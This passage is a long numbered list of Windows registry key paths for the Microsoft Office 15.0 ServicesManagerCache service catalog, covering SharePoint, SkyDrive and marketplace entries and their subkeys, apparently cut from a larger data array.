  939. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata",
  940. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\KeyTip",
  941. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\Type",
  942. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails",
  943. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
  944. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
  945. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
  946. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED",
  947. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Capabilities",
  948. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ConnectMechanism",
  949. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsManaged",
  950. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsRemovable",
  951. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceOwner",
  952. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SortOrder",
  953. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SupportsMultiple",
  954. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\CapabilitiesMetadata",
  955. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Description",
  956. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Name",
  957. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceId",
  958. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceUrl",
  959. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata",
  960. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\KeyTip",
  961. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\Type",
  962. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT",
  963. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Capabilities",
  964. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ConnectMechanism",
  965. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsManaged",
  966. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsRemovable",
  967. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceOwner",
  968. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SortOrder",
  969. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SupportsMultiple",
  970. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\CapabilitiesMetadata",
  971. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Description",
  972. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Name",
  973. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceId",
  974. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceUrl",
  975. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata",
  976. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\DefaultFolderRelativePath",
  977. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\KeyTip",
  978. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata\\Type",
  979. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails",
  980. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url16x16",
  981. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url32x32",
  982. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Thumbnails\\Url48x48",
  983. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP",
  984. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Capabilities",
  985. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ConnectMechanism",
  986. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsManaged",
  987. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\IsRemovable",
  988. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceOwner",
  989. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SortOrder",
  990. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\SupportsMultiple",
  991. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\CapabilitiesMetadata",
  992. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Description",
  993. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Name",
  994. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceId",
  995. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\ServiceUrl",
  996. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata",
  997. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\KeyTip",
  998. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Metadata\\Type",
  999. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails",
  1000. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
  1001. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
  1002. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
  1003. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER",
  1004. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Capabilities",
  1005. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ConnectMechanism",
  1006. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsManaged",
  1007. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\IsRemovable",
  1008. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceOwner",
  1009. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SortOrder",
  1010. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\SupportsMultiple",
  1011. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\CapabilitiesMetadata",
  1012. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Description",
  1013. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Name",
  1014. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceId",
  1015. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\ServiceUrl",
  1016. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata",
  1017. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\HideIfEmpty",
  1018. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\KeyTip",
  1019. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Metadata\\Type",
  1020. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails",
  1021. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url16x16",
  1022. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url32x32",
  1023. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT_OTHER\\Thumbnails\\Url48x48",
  1024. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE",
  1025. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Capabilities",
  1026. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ConnectMechanism",
  1027. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsManaged",
  1028. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\IsRemovable",
  1029. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceOwner",
  1030. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SortOrder",
  1031. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\SupportsMultiple",
  1032. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\CapabilitiesMetadata",
  1033. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Description",
  1034. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Name",
  1035. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceId",
  1036. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\ServiceUrl",
  1037. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata",
  1038. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
  1039. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
  1040. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\KeyTip",
  1041. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\RegularExpression",
  1042. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Metadata\\Type",
  1043. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails",
  1044. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url16x16",
  1045. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url32x32",
  1046. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLINBOX_SKYDRIVE\\Thumbnails\\Url48x48",
  1047. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT",
  1048. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Capabilities",
  1049. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ConnectMechanism",
  1050. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsManaged",
  1051. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\IsRemovable",
  1052. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceOwner",
  1053. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SortOrder",
  1054. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\SupportsMultiple",
  1055. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Description",
  1056. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Name",
  1057. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceId",
  1058. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\ServiceUrl",
  1059. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails",
  1060. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url16x16",
  1061. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url32x32",
  1062. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_CONNECT\\Thumbnails\\Url48x48",
  1063. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE",
  1064. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Capabilities",
  1065. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ConnectMechanism",
  1066. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsManaged",
  1067. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\IsRemovable",
  1068. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceOwner",
  1069. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SortOrder",
  1070. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\SupportsMultiple",
  1071. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Description",
  1072. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Name",
  1073. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceId",
  1074. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\ServiceUrl",
  1075. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails",
  1076. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url16x16",
  1077. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url32x32",
  1078. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_MARKETPLACE\\Thumbnails\\Url48x48",
  1079. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE",
  1080. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Capabilities",
  1081. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ConnectMechanism",
  1082. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsManaged",
  1083. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\IsRemovable",
  1084. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceOwner",
  1085. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SortOrder",
  1086. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\SupportsMultiple",
  1087. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\CapabilitiesMetadata",
  1088. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Description",
  1089. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Name",
  1090. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceId",
  1091. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\ServiceUrl",
  1092. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata",
  1093. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultCreateRelativePath",
  1094. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\DefaultFolderRelativePath",
  1095. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\KeyTip",
  1096. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\RegularExpression",
  1097. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Metadata\\Type",
  1098. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails",
  1099. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url16x16",
